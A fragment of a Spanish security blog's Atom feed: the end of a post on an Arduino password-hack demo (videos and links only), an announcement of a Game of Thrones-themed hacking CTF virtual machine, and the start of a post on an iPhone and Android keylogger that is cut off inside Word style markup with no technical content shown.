&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.blogger.com/video.g?token=AD6v5dx1KIckYaCejDyoeS7CwO96cXHpWektXdKukPQQ_kJRaJIpPeEJ6fFIe16y-bz7sIfitA8ivyg1hPfmLqRwYg&#39; class=&#39;b-hbp-video b-uploaded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.blogger.com/video.g?token=AD6v5dxxQ_5gZMwANdg0sRTYbSUR5nTXY3d5EZNXDMspWjnj3mhcOGxnM_PsooJoR1_kXeKJDWQDveoL6twB07Z37w&#39; class=&#39;b-hbp-video b-uploaded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;
Hasta aquí este rápido post en referencia a MR.Robot, desde una perspectiva bastante de mileurista, ya sabéis que cualquier duda me podéis escribir a mi twitter: &lt;a href=&quot;https://twitter.com/Erockandblues&quot; target=&quot;_blank&quot;&gt;Fare9&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Antes de finalizar, recordaros que nuestro compañero del blog Óscar aka Elvis, subió hace poco una máquina de CTF basada en juego de tronos, yo estoy ahora con ella actualmente y la verdad que resulta bastante entretenida, aquí el enlace:&amp;nbsp;&lt;a href=&quot;https://github.com/OscarAkaElvis/game-of-thrones-hacking-ctf&quot; target=&quot;_blank&quot;&gt;https://github.com/OscarAkaElvis/game-of-thrones-hacking-ctf&lt;/a&gt;&lt;br /&gt;
A jugar, jugar y divertirse!!!!!!&lt;br /&gt;
&lt;br /&gt;
Idea original del post: &lt;a href=&quot;https://www.hak5.org/blog/15-second-password-hack-mr-robot-style&quot; target=&quot;_blank&quot;&gt;https://www.hak5.org/blog/15-second-password-hack-mr-robot-style&lt;/a&gt;&lt;br /&gt;
Código arduino y Python autor: Fare9&amp;nbsp; &lt;br /&gt;
&lt;h1 class=&quot;product-name&quot; itemprop=&quot;name&quot;&gt;
&lt;/h1&gt;
&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='https://estacioninformatica.blogspot.com/feeds/1996196117045677712/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='https://estacioninformatica.blogspot.com/2017/09/mrrobot-tambien-en-arduino.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/1996196117045677712'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/1996196117045677712'/><link rel='alternate' type='text/html' href='https://estacioninformatica.blogspot.com/2017/09/mrrobot-tambien-en-arduino.html' title='Mr.Robot también en Arduino'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRZsoR4mO0i1snHvZCX_zBWz7yUUBrndPSAmW9sfBDGhhTCCsqZyeTfY0QxbT3U7zylUNIFJoqtNgZkUju4EPrB7w_V4senJSNFbfumA-qTXQhTYqWqChMpEyCMDLs-A0Y2d0QptdDooY/s72-c/4d7.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2635749723269966578.post-4137032872612097880</id><published>2017-09-08T09:46:00.002+02:00</published><updated>2017-09-13T00:24:16.956+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="capture the flag"/><category scheme="http://www.blogger.com/atom/ns#" term="challenge"/><category scheme="http://www.blogger.com/atom/ns#" term="ctf"/><category scheme="http://www.blogger.com/atom/ns#" term="cybersecurity"/><category scheme="http://www.blogger.com/atom/ns#" term="game of thrones"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="juego de tronos"/><category scheme="http://www.blogger.com/atom/ns#" term="Pentesting"/><category scheme="http://www.blogger.com/atom/ns#" term="Reto"/><category scheme="http://www.blogger.com/atom/ns#" term="virtualbox"/><category scheme="http://www.blogger.com/atom/ns#" term="vm"/><category scheme="http://www.blogger.com/atom/ns#" term="vmware"/><title type='text'>Game of Thrones Hacking CTF</title><content type='html'>Hola a todos, vengo a presentaros otra iniciativa para promover el hacking. ¿Qué mejor manera que jugando? Se trata de un reto de hacking que además viene ambientado en el mundo de fantasía de Juego de Tronos.&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://raw.githubusercontent.com/OscarAkaElvis/game-of-thrones-hacking-ctf/master/imgs/ctf-banner.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;109&quot; data-original-width=&quot;800&quot; height=&quot;86&quot; src=&quot;https://raw.githubusercontent.com/OscarAkaElvis/game-of-thrones-hacking-ctf/master/imgs/ctf-banner.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Banner&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
Se trata de una máquina virtual compatible con Vmware y Virtualbox. Tras importarla y levantarla, deberemos &quot;destripar&quot; este servidor que ofrece múltiples servicios y posibilidades. Al viejo estilo de capturar la bandera (CTF Capture de Flag), se trata de ir hackeando poco a poco los servicios de esta máquina e ir encontrando las diferentes banderas hasta completar el reto.&lt;br /&gt;
&lt;br /&gt;
Se deberá ir &quot;viajando&quot; por los siete reinos conquistando sus banderas uno a uno. Además de esto, está el contenido extra que son algunas banderas secretas y la batalla final. Son un total de 11 contando todas las banderas.&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href=&quot;https://raw.githubusercontent.com/OscarAkaElvis/game-of-thrones-hacking-ctf/master/imgs/ctf-screenshot2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;169&quot; data-original-width=&quot;535&quot; height=&quot;126&quot; src=&quot;https://raw.githubusercontent.com/OscarAkaElvis/game-of-thrones-hacking-ctf/master/imgs/ctf-screenshot2.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;font-size: 12.8px;&quot;&gt;Prompt de login de la vm del reto&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
El nivel del reto es medio-alto. Algunas banderas pueden resultar más o menos sencillas y otras no tanto. Podría ser peor! podría ser puramente alto o muy alto!! así que si te gusta la seguridad informática anímate sea cual sea tu nivel e inténtalo. Ten por seguro que algo aprenderás además de divertirte y pasar un buen rato.&lt;br /&gt;
&lt;br /&gt;
Esta es la url del reto, en ella podemos encontrar algunas instrucciones y los links de descarga:&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://github.com/OscarAkaElvis/game-of-thrones-hacking-ctf&quot; target=&quot;_blank&quot;&gt;https://github.com/OscarAkaElvis/game-of-thrones-hacking-ctf&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
El reto está íntegramente en inglés, todo hay que decirlo. Cualquier duda podéis consultarla con el autor (un servidor) en los mails de contacto que se indican en la página.&lt;br /&gt;
&lt;br /&gt;
Buena suerte a los participantes y que los dioses nuevos y los antiguos os protejan!!!</content><link rel='replies' type='application/atom+xml' href='https://estacioninformatica.blogspot.com/feeds/4137032872612097880/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='https://estacioninformatica.blogspot.com/2017/09/game-of-thrones-hacking-ctf.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/4137032872612097880'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/4137032872612097880'/><link rel='alternate' type='text/html' href='https://estacioninformatica.blogspot.com/2017/09/game-of-thrones-hacking-ctf.html' title='Game of Thrones Hacking CTF'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2635749723269966578.post-6077341289624290960</id><published>2017-09-06T20:44:00.000+02:00</published><updated>2017-09-06T20:44:08.495+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Android"/><category scheme="http://www.blogger.com/atom/ns#" term="Data Science"/><category scheme="http://www.blogger.com/atom/ns#" term="iPhone"/><category scheme="http://www.blogger.com/atom/ns#" term="Keylogger"/><category scheme="http://www.blogger.com/atom/ns#" term="Machine Learning"/><category scheme="http://www.blogger.com/atom/ns#" term="Research"/><title type='text'>Axolotl un Keylogger para iPhone y Android</title><content type='html'>Hola a tod@s&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;ES&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val=&quot;Cambria Math&quot;/&gt;
   &lt;m:brkBin m:val=&quot;before&quot;/&gt;
   &lt;m:brkBinSub m:val=&quot;--&quot;/&gt;
   &lt;m:smallFrac m:val=&quot;off&quot;/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val=&quot;0&quot;/&gt;
   &lt;m:rMargin m:val=&quot;0&quot;/&gt;
   &lt;m:defJc m:val=&quot;centerGroup&quot;/&gt;
   &lt;m:wrapIndent m:val=&quot;1440&quot;/&gt;
   &lt;m:intLim m:val=&quot;subSup&quot;/&gt;
   &lt;m:naryLim m:val=&quot;undOvr&quot;/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState=&quot;false&quot; DefUnhideWhenUsed=&quot;true&quot;
  DefSemiHidden=&quot;true&quot; DefQFormat=&quot;false&quot; DefPriority=&quot;99&quot;
  LatentStyleCount=&quot;267&quot;&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;0&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Normal&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;heading 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;35&quot; QFormat=&quot;true&quot; Name=&quot;caption&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;10&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Title&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; Name=&quot;Default Paragraph Font&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;11&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtitle&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;22&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Strong&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;20&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;59&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Table Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; UnhideWhenUsed=&quot;false&quot; Name=&quot;Placeholder Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;No Spacing&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; UnhideWhenUsed=&quot;false&quot; Name=&quot;Revision&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;34&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;List Paragraph&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;29&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Quote&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;30&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Quote&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 3&quot;/&gt;
